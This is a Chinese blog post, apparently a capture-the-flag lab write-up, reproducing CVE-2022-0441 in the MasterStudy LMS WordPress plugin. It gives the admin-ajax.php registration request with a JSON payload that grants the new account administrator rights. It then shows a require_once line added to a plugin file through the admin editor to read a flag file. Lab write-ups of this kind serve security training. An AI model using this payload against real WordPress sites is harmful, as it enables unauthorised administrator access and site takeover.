【春秋云镜】CVE-2022-0441(Wordpress插件任意用户添加)

最新推荐文章于 2024-11-06 22:31:51 发布
最新推荐文章于 2024-11-06 22:31:51 发布
阅读量245 收藏 3
点赞数 7
文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44423566/article/details/142485029
版权

目录

前言

漏洞复现

前言

第六篇CVE复现,觉得还不错的靓仔靓女们可以点点赞。

漏洞复现

        靶场信息如下图所示。

        打开靶场主页面,查看页面的源代码,并查询关键字stm_lms_register,它所对应的值就是nonce参数的值,如下图所示。

        访问路径 /wp-admin/admin-ajax.php?action=stm_lms_register&nonce=0dca18e2ba 并使用burpsuite进行抓包,改请求方式为POST,POST请求参数如下(nonce的值记得改一改):

{"user_login":"USERNAME","user_email":"123456789@qq.com","user_password":"Password123","user_password_re":"Password123","become_instructor":"","privacy_policy":true,"degree":"","expertize":"","auditory":"","additional":[],"additional_instructors":[],"profile_default_fields_for_register":{"wp_capabilities":{"value":{"administrator":1}}}}

        发送报文后提示成功添加用户,如下图所示。

        添加用户完毕后访问wp-login.php跳转到后台登录页面,使用上面添加的邮箱信息和密码登入后台。

        登入后台的页面如下图所示,后台没有直接显示出flag的内容,所以需要同时利用wordpress的后台漏洞来读取文件。

        在左侧菜单栏的“插件”处可以直接编辑插件里的PHP文件,直接在插件文件中添加代码:require_once("/flag"); 将flag文件包含到此文件中,如下图所示。

        注意这里的插件要选择当前漏洞对应的插件,其他插件可能不在可使用状态,因为题目里说的是插件MasterStudy LMS的漏洞,所以最好选择这个插件的文件进行编辑。

        最后访问刚刚编辑过的插件文件,得到flag如下图所示。

网安小登
关注
春秋云境Brute4Road-WP【一遍过】
weixin_63576152的博客
10-12 406
ps:为方便操作,可以用msfvenom生成正向shell,上传到靶机运行,再利用msfconsole获得shell,这样就能在kali上操作了。首先通过Rubeus申请机器账户MSSQLSERVER的TGT,执行后,将得到 Base64 加密后的 TGT 票据。在/home/redis/flag目录下发现了flag01,但是没有cat的权限。发现Redis未授权和ftp匿名账号登陆,这里用Redis主从rce的方式打(正常情况下:输入r后依次输入vps的ip和端口2,端口2必须是vps上开放的。
CVE-2022-40664 ShiroFilter1.7和1.10对于forward请求的处理
xyjy11的博客
10-14 4290
shiroFilter拦截forward、include请求
春秋云境:CVE-2022-24663
一只爱吃橙子的羊
12-01 1567
远程代码执行漏洞,任何订阅者都可以利用该漏洞发送带有“短代码”参数设置为 PHP Everywhere 的请求,并在站点上执行任意 PHP 代码。P.S. 存在常见用户名低权限用户弱口令
春秋云镜 CVE-2022-24663
qq_22002773的博客
07-07 153
春秋云镜 CVE-2022-24663
春秋云境CVE-2022-24663复现
qq_70303095的博客
03-06 412
CVE-2022-24663复现
[春秋云镜]CVE-2014-4577
niubi707的博客
12-09 922
春秋云镜CVE-2014-4577wordpress插件 wp-amasin-the-amazon-affiliate-shop < 0.97 存在路径穿越漏洞,使得可以读取任意文件。
春秋云镜 CVE-2015-9331
qq_22002773的博客
09-12 875
春秋云镜 CVE-2015-9331
春秋云镜 CVE-2014-4577
qq_22002773的博客
09-15 357
春秋云镜 CVE-2014-4577
WordPress PHP Everywhere <= 2.0.3 远程代码执行漏洞(CVE-2022-24663)
热门推荐
Flag少侠的博客
07-10 1万+
打开靶场靶场页面如下WordPress 的后台是 /wp-admin,URL 拼接上访问网上搜索默认用户名密码 admin/password 不对,只能爆破了,得到 test/test登录后来到这个页面是一个 WordPress 插件,它允许在 WordPress 网站的任意位置(如页面、帖子、小工具和模板文件)执行 PHP 代码。这个插件对于希望在其网站上嵌入动态内容的开发人员和高级用户非常有用。然而,它也带来了安全风险,尤其是在权限控制不当的情况下。功能和使用插件的主要功能是通过短代码。
春秋云境 CVE-2022-4230 夺旗
05-02
### 春秋云境 CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661.pdf
09-27
WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661】是一个近期发现的安全问题,涉及到WordPress的核心函数`WP_Query`。这个漏洞并非直接的SQL注入,但因为`WP_Query`经常被WordPress插件广泛使用,所以其潜在的危害...
春秋云镜CVE-2022-30887 Pharmacy Management System shell upload漏洞复现
Ambition_sec的博客
11-17 1633
春秋云镜CVE-2022-30887 Pharmacy Management System shell upload漏洞复现
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8533
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
防火墙|WAF|漏洞|网络安全
最新发布
qq_43777616的博客
11-06 341
一种网络安全设备,监视网络流量,并且根据预定义的规则和策略检测阻止可能的网络攻击,可以部署在网络边界(不同安全级别的网络之间的连接形成了网络边界)、数据中心、云环境、边界防火墙等位置部署,以防止来自外部和内部网络的攻击。防火墙工作于OSI模型层次越高,检查数据包中的信息就越多,消耗的工作周期越长,提供的安全保护等级就越高。漏洞是指一个系统存在的弱点或缺陷,系统对特定威胁攻击或危险事件的敏感性,或进行攻击的威胁作用的可能性。单独的硬件,用于过滤进出网络的流量,适合大型企业。
网络安全从入门到精通(特别篇IIl):应急响应之病毒蠕虫处置流程
HACKONE的博客
11-06 53
排查 init.d 目录下的脚本文件,如果某个脚本启动的服务进程与名称不符,或者脚本文件的内容被修改,加有别的什么东西启动了别的进程,必须仔细排查,极可能是被用来启动后门进程了。排查C: \、C: \winnt、C: \winnt\System 、C: \winnt\ System32、C: \winnt\System32\dllcache、C: \winnt\System32\ drivers、各个Program Files目录下的内容,排查他们目录及文件的属性,若无版本说明,多为可疑文件;
2024年网络安全进阶手册:黑客技术自学路线
2401_85026965的博客
10-29 1477
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
入门网络安全工程师要学习哪些内容(详细教程)
白帽子佳奇的博客
11-06 418
大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对还是不了解,不知道需要学什么?知了堂小编总结出以下要点。是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和不一样,如果你想成为安全开发工程师,学的侧重点就和安全不一样。学的东西很泛,但选定方向就简单了。大致的学习流程总结就是:网络基础、操作系统、中间件、数据库。其中电脑基础:像系统Windows基础和Linux基础、HTML基础、代码JS基础等。
春秋云镜CVE-2022-0543
09-04
根据提供的引用内容,春秋云镜CVE-2022-0543指的是Apache Spark的命令注入漏洞(CVE-2022-33891)。这个漏洞影响的版本包括Apache Spark version 3.1.1和Apache Spark version >= 3.3.0。 官方建议升级到安全版本来...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值